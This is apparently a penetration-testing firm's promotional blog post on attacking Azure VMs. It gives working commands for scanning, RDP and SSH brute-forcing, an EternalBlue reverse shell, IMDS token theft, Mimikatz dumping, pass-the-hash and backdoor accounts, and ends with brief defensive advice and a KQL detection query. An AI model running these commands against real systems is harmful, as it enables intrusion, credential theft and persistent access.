Cloud infrastructure has become the backbone of modern enterprises, and Microsoft Azure is one of the most widely adopted platforms globally. Azure Virtual Machines (VMs) offer scalability, flexibility, and seamless integration with enterprise workloads. But with that power comes a significant attack surface. Threat actors increasingly target Azure VMs to gain initial access, escalate privileges, and move laterally across cloud environments, often staying undetected for weeks or months.
This blog breaks down exactly how adversaries exploit Azure Virtual Machines, what lateral movement looks like inside an Azure environment, and how your organization can proactively defend against these techniques through professional penetration testing.
Azure VMs sit at the intersection of on-premise infrastructure and cloud resources. They often hold sensitive credentials, connect to internal networks, have access to Azure storage accounts, and communicate with other cloud services. Attackers who compromise a single VM can potentially pivot to databases, key vaults, service principals, and even Azure Active Directory.
Common reasons Azure VMs become entry points include misconfigured Network Security Groups (NSGs), publicly exposed RDP or SSH ports, weak or reused credentials, unpatched OS vulnerabilities, and overly permissive Managed Identity assignments.
If your Azure environment has not been assessed by qualified professionals, these misconfigurations may already be present. Redfox Cybersecurity offers specialized cloud penetration testing services that uncover exactly these types of exposures before attackers do.
Before exploitation, an attacker performs reconnaissance to identify exposed Azure resources.
Tools like Microburst and ROADtools allow attackers (and red teamers) to enumerate Azure subscriptions, resource groups, VMs, and storage accounts.
# Install Microburst (PowerShell-based Azure recon tool)
Import-Module .\MicroBurst.psm1
# Enumerate all Azure VMs accessible with stolen credentials
Get-AzureDomainInfo -folder MicroBurst -Verbose
# Identify publicly exposed storage blobs
Invoke-EnumerateAzureBlobs -Base targetcompany
[cta]
Using tools like Shodan, Masscan, or nmap, attackers scan for Azure VMs with open RDP (3389) or SSH (22) ports:
# nmap scan for open RDP on an Azure IP range
nmap -p 3389 --open -T4 -oG rdp_results.txt 20.0.0.0/8
# Masscan for faster large-scale scanning
masscan -p22,3389 20.0.0.0/8 --rate=10000
[cta]
Organizations that expose management ports directly to the internet are offering attackers a direct doorway. This is one of the first things the Redfox Cybersecurity pentesting team checks during an Azure security assessment.
Once attackers identify a target VM, they attempt to gain initial access through several techniques.
Azure VMs running Windows commonly expose RDP. Attackers use tools like Hydra or Medusa to brute-force credentials:
# Brute-force RDP with Hydra
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://20.x.x.x -t 4
# SSH brute-force against Linux Azure VM
hydra -l azureuser -P passwords.txt ssh://20.x.x.x -t 6 -V
[cta]
Azure does not block brute-force attacks by default unless account lockout policies and NSG rules are explicitly configured. Many organizations skip this hardening step.
Azure VMs running outdated OS versions are vulnerable to known CVEs. One notorious example is EternalBlue (MS17-010), still found in legacy Azure environments:
# Using Metasploit to exploit EternalBlue on an unpatched Windows Azure VM
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 20.x.x.x
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker_ip>
run
[cta]
The Azure Instance Metadata Service runs at a non-routable address (169.254.169.254) and is accessible from within any VM. If an attacker gains code execution on a VM, even through a web application vulnerability, they can query IMDS for sensitive information including Managed Identity tokens:
# Query IMDS for VM metadata
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01" | python3 -m json.tool
# Steal Managed Identity access token
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | python3 -m json.tool
[cta]
If the VM has a Managed Identity assigned with broad permissions, this token can be used to interact with the Azure Resource Manager API and access other resources across the subscription. This is a critical attack vector that requires expert-level assessment. Engage Redfox Cybersecurity to test whether your Managed Identities are over-privileged.
Once inside a VM, attackers work to escalate privileges to SYSTEM or root level.
# Enumerate unquoted service paths on Windows Azure VM
wmic service get name,displayname,pathname,startmode | \
findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
# Check for weak permissions on service binaries
icacls "C:\Program Files\VulnerableService\service.exe"
[cta]
# Check sudo privileges
sudo -l
# If (ALL) NOPASSWD is present on a binary like vim
sudo vim -c '!bash'
# Results in root shell
[cta]
On Windows Azure VMs, attackers frequently use Mimikatz to extract credentials from LSASS memory:
# Run Mimikatz (requires SYSTEM or admin privileges)
privilege::debug
sekurlsa::logonpasswords
# Dump NTLM hashes from SAM database
lsadump::sam
lsadump::secrets
[cta]
These credentials can then be used for lateral movement across the Azure environment and connected on-premises networks.
Lateral movement in Azure is significantly more complex than in traditional on-premises environments. Attackers leverage cloud APIs, stolen tokens, and network-level pivoting simultaneously.
After stealing an IMDS-derived access token, attackers interact with Azure resources using the Azure CLI or raw REST API calls:
# Set stolen token as the active credential
export ARM_ACCESS_TOKEN="eyJ0eXAiOiJKV1Qi..."
# List all VMs in the subscription using the stolen token
curl -H "Authorization: Bearer $ARM_ACCESS_TOKEN" \
"https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.Compute/virtualMachines?api-version=2022-03-01"
# List storage accounts accessible with this identity
az storage account list --subscription {subscriptionId}
[cta]
Organizations using Azure Bastion or Just-in-Time (JIT) VM access may still be vulnerable if an attacker has compromised an account with the necessary IAM role. Using Az PowerShell, attackers can request JIT access:
# Request JIT access to a target VM
$JitPolicy = @{
id = "/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Compute/virtualMachines/{vmName}"
ports = @{
number = 22
endTimeUtc = (Get-Date).AddHours(3).ToUniversalTime().ToString("o")
allowedSourceAddressPrefix = "attacker_ip"
}
}
Start-AzJitNetworkAccessPolicy -ResourceId $JitPolicy.id -VirtualMachine $JitPolicy
[cta]
If NTLM hashes are harvested from a compromised VM, attackers move laterally to other Windows VMs in the same virtual network:
# Pass-the-Hash using CrackMapExec against internal Azure VMs
crackmapexec smb 10.0.0.0/24 -u Administrator -H <NTLM_hash> --shares
# Execute commands remotely via SMB
crackmapexec smb 10.0.1.5 -u Administrator -H <NTLM_hash> -x "whoami"
[cta]
Attackers who gain access to service principal credentials stored on a VM can authenticate to Azure AD and pivot to other cloud resources:
# Login to Azure CLI with stolen service principal credentials
az login --service-principal \
-u <appId> -p <password> --tenant <tenantId>
# Enumerate role assignments to understand blast radius
az role assignment list --all --output table
# Access Key Vault secrets if permissions allow
az keyvault secret list --vault-name TargetKeyVault
az keyvault secret show --vault-name TargetKeyVault --name DatabasePassword
[cta]
A compromised Key Vault can expose database connection strings, API keys, and other secrets that extend the attacker's reach far beyond the initial VM foothold. If you want to know whether your Azure service principals are exposed, Redfox Cybersecurity's penetration testing team can map your entire privilege graph and identify the most critical paths to your crown jewels.
After gaining access, attackers establish persistence to survive reboots and credential rotations.
Azure allows VM extensions to be deployed remotely. Attackers with sufficient Azure RBAC permissions can push a malicious script:
# Deploy a custom script extension as a backdoor (attacker with Contributor role)
az vm extension set \
--resource-group TargetRG \
--vm-name TargetVM \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--settings '{"commandToExecute":"powershell -EncodedCommand <base64_payload>"}'
[cta]
On Linux VMs, attackers add their public key to maintain persistent SSH access:
# Add attacker's public key to the authorized_keys file
echo "ssh-rsa AAAA...attackerkey... attacker@kali" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
[cta]
If the compromised account has User Administrator or Global Administrator rights in Azure AD, attackers create a shadow admin account:
# Create a new backdoor Azure AD user via Graph API
$body = @{
accountEnabled = $true
displayName = "Support Account"
mailNickname = "supportacct"
userPrincipalName = "support@targetdomain.onmicrosoft.com"
passwordProfile = @{
forceChangePasswordNextSignIn = $false
password = "Backdoor@1234"
}
}
Invoke-RestMethod -Method Post \
-Uri "https://graph.microsoft.com/v1.0/users" \
-Headers @{Authorization = "Bearer $token"} \
-Body ($body | ConvertTo-Json) -ContentType "application/json"
[cta]
Understanding attacker techniques is only half the equation. Defenders must implement layered controls to detect and respond to these attacks.
Microsoft Defender for Cloud should be enabled across all subscriptions to generate alerts for suspicious activities including IMDS token abuse, anomalous API calls, and brute-force attempts. Azure Monitor and Log Analytics should capture VM-level logs, authentication events, and network flows.
NSGs should be hardened to block all inbound RDP and SSH from the internet. Azure Bastion or a dedicated VPN should be the only access path to management ports. Managed Identities should follow least-privilege principles, with regular audits of role assignments.
// KQL query in Microsoft Sentinel to detect suspicious IMDS token requests followed by ARM API calls
AzureActivity
| where OperationNameValue contains "Microsoft.Compute/virtualMachines"
| where ActivityStatusValue == "Success"
| join kind=inner (
SigninLogs
| where AppDisplayName == "Azure Instance Metadata Service"
) on CorrelationId
| project TimeGenerated, CallerIpAddress, ResourceGroup, OperationNameValue
[cta]
Even with these controls, configuration drift and human error create gaps over time. Regular penetration testing by experienced professionals remains the most reliable way to validate your defenses. Get a comprehensive Azure penetration test from Redfox Cybersecurity and receive actionable findings mapped to MITRE ATT&CK, complete with remediation guidance tailored to your environment.
Azure Virtual Machines remain one of the most targeted assets in cloud environments. The attack paths covered in this blog, from IMDS token theft and credential dumping to lateral movement through service principals and Key Vaults, represent real techniques used by adversaries today. They are not theoretical. They show up in red team engagements, breach investigations, and bug bounty reports every single week.
The organizations that stay ahead of these threats are not the ones with the biggest security budgets. They are the ones that test their defenses regularly, understand their attack surface from an adversary's perspective, and act on the findings before attackers do.
Redfox Cybersecurity specializes in cloud-focused penetration testing, red teaming, and adversary simulation across Azure, AWS, and GCP environments. Our team combines deep offensive security expertise with cloud-native knowledge to identify the vulnerabilities that automated scanners miss.
Schedule your Azure penetration test with Redfox Cybersecurity today and find out what an attacker would find before they get the chance to look.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
